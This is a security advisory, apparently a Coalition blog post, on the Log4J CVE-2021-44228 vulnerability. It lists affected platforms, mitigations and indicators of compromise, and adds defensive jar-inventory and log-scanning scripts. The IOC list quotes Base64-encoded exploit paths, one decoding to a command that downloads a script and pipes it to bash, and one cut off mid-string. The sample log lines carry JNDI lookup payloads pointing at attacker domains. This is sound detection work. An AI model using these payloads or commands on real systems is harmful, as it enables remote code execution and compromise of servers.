
New Vulnerability in Log4J - CVE-2021-44228


On Friday, a new critical vulnerability was disclosed in Log4J, a logging library used across many Java-based platforms that powers different parts of the internet.

At Coalition, our mission is to solve cyber risk. We continuously scan the internet to identify infrastructure assets exposed to different cyber security risks. Once the Log4j vulnerability was disclosed, we quickly implemented a detection capability for it and ran the new scanner against all Coalition cyber security insurance policyholders and Coalition Control users. Additionally, we will contact all entities using vulnerable versions of the Log4j library or software that relies on Log4j.

What is Log4J?

Log4J is an open-source logging framework that developers use to record actions and activities within their applications. It is used by platforms such as Minecraft, VMware, Elasticsearch, Apple, Cloudflare, Amazon Web Services, and Tesla, along with various Apache projects such as Struts, Druid, ActiveMQ, Flume, Hadoop and Kafka, among many others.

What does this mean for me?

Don't panic. If you are a Coalition policyholder, log into your Coalition Control account and check for a notification asking you to remediate issues. Additionally, we are publishing and regularly updating the Vulnerable Platforms section below with platforms that are vulnerable to CVE-2021-44228.

Check whether you are running any of the vulnerable software internally in your network, as Coalition Control only has visibility into assets exposed to the internet. Once you have your list of assets, it is time to mitigate the issue.

Mitigation techniques, in order of preference (the first delivers the most protection)

Preferred

Update to Log4J 2.16.0, available at https://logging.apache.org/log4j/2.x/download.html. This release completely removes the affected JNDI component and provides the maximum protection against attacks on Log4J.

Acceptable, but not preferred

Update to Log4J 2.15.0. This release disables the JNDI component by default, which means the vector could be re-enabled at a later date. This option provides less protection because the component can be turned back on, and a future software vulnerability could provide a vector to re-enable it.

Temporary only

Taken from the Log4J Bulletin at https://logging.apache.org/log4j/2.x/security.html

Mitigation: In releases >=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases >=2.7 and <=2.14.1, all PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m. For releases >=2.0-beta9 and <=2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.

This method should only be used if none of the mitigation methods above are available to you. In some cases these mitigations can be undone by restarting the affected software or operating system. Please consider this a temporary measure while working toward an upgrade to Log4j 2.16.0.
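To turn the three tiers above into a check you can run against a host or an unpacked application, here is an added example (not Coalition's or Apache's tooling) that inspects every log4j-core jar under a directory, reads the version from the jar manifest, and reports whether the JndiLookup class named in the bulletin's temporary mitigation is still present. It assumes the manifest carries an Implementation-Version header; when it does not, the check falls back to class presence alone. The sample jars built at the bottom are constructed stand-ins, not real Log4J artifacts.

```python
"""Inventory check for log4j-core jars, mapped to the mitigation tiers in the post.

Added example, not Coalition's or Apache's tooling. Assumes META-INF/MANIFEST.MF
carries an Implementation-Version header (assumption); if it is missing, the result
rests on the presence of the JndiLookup class alone.
"""
import io
import re
import sys
import zipfile
from pathlib import Path

# Class named in the Apache bulletin's "remove JndiLookup from the classpath" mitigation.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def parse_version(version):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0).

    Pre-release suffixes are dropped, so every 2.0 beta is treated as inside the
    affected range (conservative: the bulletin starts the range at 2.0-beta9).
    """
    nums = []
    for part in re.split(r"[.\-]", version):
        if not part.isdigit():
            break
        nums.append(int(part))
    while len(nums) < 3:
        nums.append(0)
    return tuple(nums[:3])


def assess_jar(jar_bytes):
    """Classify one log4j-core jar: fixed (>=2.16.0), partially_mitigated (2.15.0),
    temporarily_mitigated (JndiLookup removed), outside_affected_range (<2.0), or vulnerable."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        names = set(zf.namelist())
        version = None
        if "META-INF/MANIFEST.MF" in names:
            manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
            match = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.M)
            if match:
                version = match.group(1)
    has_jndi = JNDI_LOOKUP_CLASS in names

    if version is None:
        # Unknown version: the class being present is the only signal available.
        status = "vulnerable" if has_jndi else "temporarily_mitigated"
    else:
        v = parse_version(version)
        if v >= (2, 16, 0):
            status = "fixed"
        elif v >= (2, 15, 0):
            status = "partially_mitigated"
        elif v < (2, 0, 0):
            status = "outside_affected_range"
        elif not has_jndi:
            status = "temporarily_mitigated"
        else:
            status = "vulnerable"
    return {"version": version, "jndi_lookup_present": has_jndi, "status": status}


def scan_directory(root):
    """Assess every log4j-core*.jar under root (works on unpacked WAR/EAR trees as well)."""
    return {str(jar): assess_jar(jar.read_bytes()) for jar in Path(root).rglob("log4j-core*.jar")}


def build_sample_jar(version, include_jndi=True):
    """Constructed stand-in for a log4j-core jar (not a real artifact), used for the demo."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF",
                    f"Manifest-Version: 1.0\nImplementation-Version: {version}\n")
        if include_jndi:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # placeholder class bytes
    return buf.getvalue()


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, result in scan_directory(sys.argv[1]).items():
            print(f"{path}: {result}")
    else:
        for ver, jndi in [("2.14.1", True), ("2.14.1", False), ("2.15.0", True), ("2.16.0", True)]:
            label = "with JndiLookup" if jndi else "without JndiLookup"
            print(ver, label, "->", assess_jar(build_sample_jar(ver, jndi))["status"])
```

Run it with a directory argument to walk a deployment tree, or without one to see the four sample cases. Note that a jar-level check cannot see the log4j2.formatMsgNoLookups system property or the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable; those apply to the running process and have to be verified there, which is also why the post treats them as temporary.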

If you have a WAF in front of your web applications, make sure to deploy filtering rules. Services such as Cloudflare, AWS, and Google Cloud Armor already offer pre-built rules. These won't stop every attack, but they are still useful against more basic attempts.

Vulnerable Platforms

This section contains a list of platforms Coalition has identified as potentially vulnerable to CVE-2021-44228. For major vendors not on this list, contact them and ask the following questions:

  • Do you use any software that relies on Log4J?

  • Have you executed any mitigations for CVE-2021-44228?

  • Did you do any investigation to confirm you have not been a victim of exploitation of CVE-2021-44228?

Known vulnerable platforms:

  • Okta RADIUS Server Agent, Okta On-Prem MFA Agent

  • Apache Struts, Solr, Druid, ActiveMQ, Flume, Hadoop, Kafka, Dubbo, Flink, Spark, Tapestry, Wicket

  • Red Hat OpenShift Container Platform 4, OpenShift Container Platform 3.11, OpenStack Platform 13 (Queens), OpenShift Logging

  • Grails

  • Ghidra

  • Minecraft

  • VMware Horizon, vCenter, HCX, NSX-T Data Center, Unified Access Gateway, Workspace ONE Access, Identity Manager, vRealize Operations, vRealize Operations Cloud Proxy, vRealize Log Insight, vRealize Automation, vRealize Lifecycle Manager, Telco Cloud Automation, Site Recovery Manager, Carbon Black Cloud Workload Appliance, Carbon Black EDR Server, Tanzu GemFire, Tanzu Greenplum, Tanzu Operations Manager, Tanzu Application Service for VMs, Tanzu Kubernetes Grid Integrated Edition, Tanzu Observability by Wavefront Nozzle, Healthwatch for Tanzu Application Service, Spring Cloud Services for VMware Tanzu, Spring Cloud Gateway for VMware Tanzu, Spring Cloud Gateway for Kubernetes, API Portal for VMware Tanzu, Single Sign-On for VMware Tanzu Application Service, App Metrics, VMware vCenter Cloud Gateway, VMware Tanzu SQL with MySQL for VMs, vRealize Orchestrator

Potentially vulnerable — can use log4j or embeds log4j

  • Apache Tomcat

  • Dropwizard

  • Elastic Kibana

  • Hibernate

  • JavaServer Faces

  • Oracle ATG Web Commerce

  • Spring Framework

A more extensive list is being maintained and regularly updated by the cybersecurity community and Twitter user @SwitHak.

IOCs

The indicators of compromise (IOCs) below are signals we have been detecting that can be used to discover whether your organization has already been attacked or compromised through this vulnerability. If you have logs, you can search them for these strings to help determine whether you've been compromised:

Domains:

  • bingsearchlib.com

  • dnslog.cn

IPs:

  • 104.244.72.115

  • 104.244.76.13

  • 107.189.1.160

  • 107.189.11.228

  • 109.237.96.124

  • 114.116.50.27

  • 128.31.0.13

  • 171.25.193.20

  • 171.25.193.25

  • 171.25.193.77

  • 171.25.193.78

  • 178.17.170.135

  • 178.17.171.102

  • 178.17.174.14

  • 179.43.187.138

  • 18.27.197.252

  • 185.100.87.202

  • 185.14.97.147

  • 185.220.100.240

  • 185.220.100.241

  • 185.220.100.242

  • 185.220.100.244

  • 185.220.100.245

  • 185.220.100.249

  • 185.220.100.250

  • 185.220.100.252

  • 185.220.101.135

  • 185.220.101.136

  • 185.220.101.137

  • 185.220.101.141

  • 185.220.101.145

  • 185.220.101.153

  • 185.220.101.156

  • 185.220.101.162

  • 185.220.101.164

  • 185.220.101.166

  • 185.220.101.170

  • 185.220.101.172

  • 185.220.101.174

  • 185.220.101.183

  • 185.220.101.189

  • 185.220.101.191

  • 185.220.101.34

  • 185.220.101.38

  • 185.220.101.41

  • 185.220.101.42

  • 185.220.101.43

  • 185.220.101.48

  • 185.220.101.50

  • 185.220.101.57

  • 185.220.101.58

  • 185.220.101.63

  • 185.38.175.132

  • 185.51.76.187

  • 195.19.192.26

  • 195.251.41.139

  • 199.195.250.77

  • 202.21.43.230

  • 204.8.156.142

  • 209.127.17.234

  • 209.141.60.19

  • 212.193.57.225

  • 219.100.36.177

  • 23.129.64.137

  • 23.129.64.143

  • 36.33.36.21

  • 45.137.21.9

  • 45.155.205.233

  • 46.166.139.111

  • 5.2.73.229

  • 51.15.43.205

  • 62.102.148.68

  • 62.76.41.46

  • 64.113.32.29

  • 84.53.225.118

  • 94.16.121.91

Strings:

jndi:ldap

/Basic/Command/Base64/

/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4LjEyL2xoLnNofHx3Z2V0IC1xIC1PLSA4MC43MS4xNTguMTIvbGguc2gpfGJhc2g=

/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC84OS4xODguNzYuMjM1OjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC84OS4xODguNzYuMjM1OjQ0Myl8YmFzaA==

/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC84OS4xODguNzYuMjUwOjgwODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU
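As an added example of the log search suggested above (not Coalition's tooling), here is a small scanner that runs the post's indicator types over log lines: the listed domains and request strings as case-insensitive substrings, and the listed IPs anchored so that an address is not matched inside a longer dotted number. Only a handful of the IPs are embedded to keep the block short; the full list from the post can be pasted into IPS. The access-log lines at the bottom are constructed for the demo, not captured traffic.

```python
"""Search log lines for the IOC strings, domains and IPs listed in the post.

Added example, not Coalition's tooling. Indicator values are copied from the post
(IPS holds a subset); SAMPLE_LOG lines are constructed for the demo.
"""
import re
import sys
from collections import namedtuple

DOMAINS = ["bingsearchlib.com", "dnslog.cn"]
IPS = ["104.244.72.115", "45.155.205.233", "185.220.101.34", "185.220.101.38", "23.129.64.137"]
STRINGS = ["jndi:ldap", "/Basic/Command/Base64/"]

# An IP must not match inside a longer dotted number (185.220.101.34 vs 185.220.101.345).
IP_PATTERNS = {ip: re.compile(r"(?<![\d.])" + re.escape(ip) + r"(?![\d.])") for ip in IPS}

Hit = namedtuple("Hit", ["line_no", "kind", "value"])


def scan_line(line):
    """Return (kind, indicator) pairs found in one line; string and domain matches ignore case,
    so mixed-case variants such as JNDI:LDAP are still caught."""
    lowered = line.lower()
    found = [("string", s) for s in STRINGS if s.lower() in lowered]
    found += [("domain", d) for d in DOMAINS if d in lowered]
    found += [("ip", ip) for ip, pat in IP_PATTERNS.items() if pat.search(line)]
    return found


def scan_lines(lines):
    """Scan an iterable of log lines and return Hit records; line numbers start at 1."""
    return [Hit(n, kind, value)
            for n, line in enumerate(lines, 1)
            for kind, value in scan_line(line)]


def scan_file(path):
    """Scan a log file on disk (web server access logs, application logs, proxy logs)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_lines(fh)


# Constructed Apache-style access log lines (not real traffic) used for the demo.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '185.220.101.34 - - [11/Dec/2021:03:14:09 +0000] "GET /login HTTP/1.1" 200 1024 "-" '
    '"${jndi:ldap://bingsearchlib.com:1389/a}"',
    '10.0.0.7 - - [11/Dec/2021:03:15:00 +0000] "GET /api HTTP/1.1" 200 88 "-" '
    '"${JNDI:LDAP://dnslog.cn/x}"',
    '10.0.0.8 - - [11/Dec/2021:03:16:00 +0000] "GET /Basic/Command/Base64/QUJD HTTP/1.1" 404 0 '
    '"-" "curl/7.68"',
]


if __name__ == "__main__":
    hits = scan_file(sys.argv[1]) if len(sys.argv) > 1 else scan_lines(SAMPLE_LOG)
    for hit in hits:
        print(f"line {hit.line_no}: {hit.kind} indicator {hit.value!r}")
```

A hit on a request string or domain shows that an exploitation attempt reached the host and is a prompt to check whether the application actually resolved the lookup (outbound LDAP or DNS from the server), while a hit on a listed source IP alone only tells you that a known scanner touched the service.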